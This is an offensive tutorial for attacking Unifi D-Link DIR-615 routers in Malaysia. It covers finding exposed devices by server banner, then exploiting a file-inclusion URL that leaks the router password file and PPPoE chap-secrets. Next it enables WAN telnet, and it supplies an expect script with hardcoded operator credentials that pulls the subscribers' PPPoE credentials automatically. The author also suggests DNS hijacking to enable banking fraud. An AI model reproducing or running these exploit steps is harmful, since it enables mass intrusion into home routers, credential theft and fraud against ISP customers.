Search for the Unifi Dlink DIR-615 router's Server details = Mathopd/1.5p6 country:MY The country filter is only for registered user so make sure you have been registered
Choose any router you want
To get the user's creds, enter the following appendage = model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd
and poof !
As you can see, TM's operator add another hidden account under different name from the previous version The good news is every D-Link router with copyright 2011 and above is using the same username and password as above while the D-Link router with the copyright 2010 and below is using username operator with different password. So you guys need to enumerate the creds for every each routers or you can just include the chap-secrets file in the url instead of getting the httpassword first (/etc/ppp/chap-secrets).
Actually the main reason for me to include /etc/ppp/httpassword is to let advanced attacker to make use of those credentials. For example, by changing the router's DNS server and set up a malicious DNS server with fake pages. This could lead to more dangerous risks such as online banking fraud, CSRF, and etc.
Go to the Maintenance tab and enable the Remote Telnet from WAN, then save the settings No reboot required
Open up a terminal and just telnet to the IP
telnet <ip> <port>
cat /etc/ppp/chap-secrets
And tadaa ! there you go the username and password
To automate the telnet part, use this simple script
#!/usr/bin/expect
set timeout 20
set ip [lindex $argv 0]
spawn telnet $ip 23
expect "login: "
send "Management\n"
expect "Password: "
send "TestingR2\n"
expect "# "
send "cat /etc/ppp/chap-secrets\n"
send "exit\n"
interact
Usage: ./unifi-pppoe-creds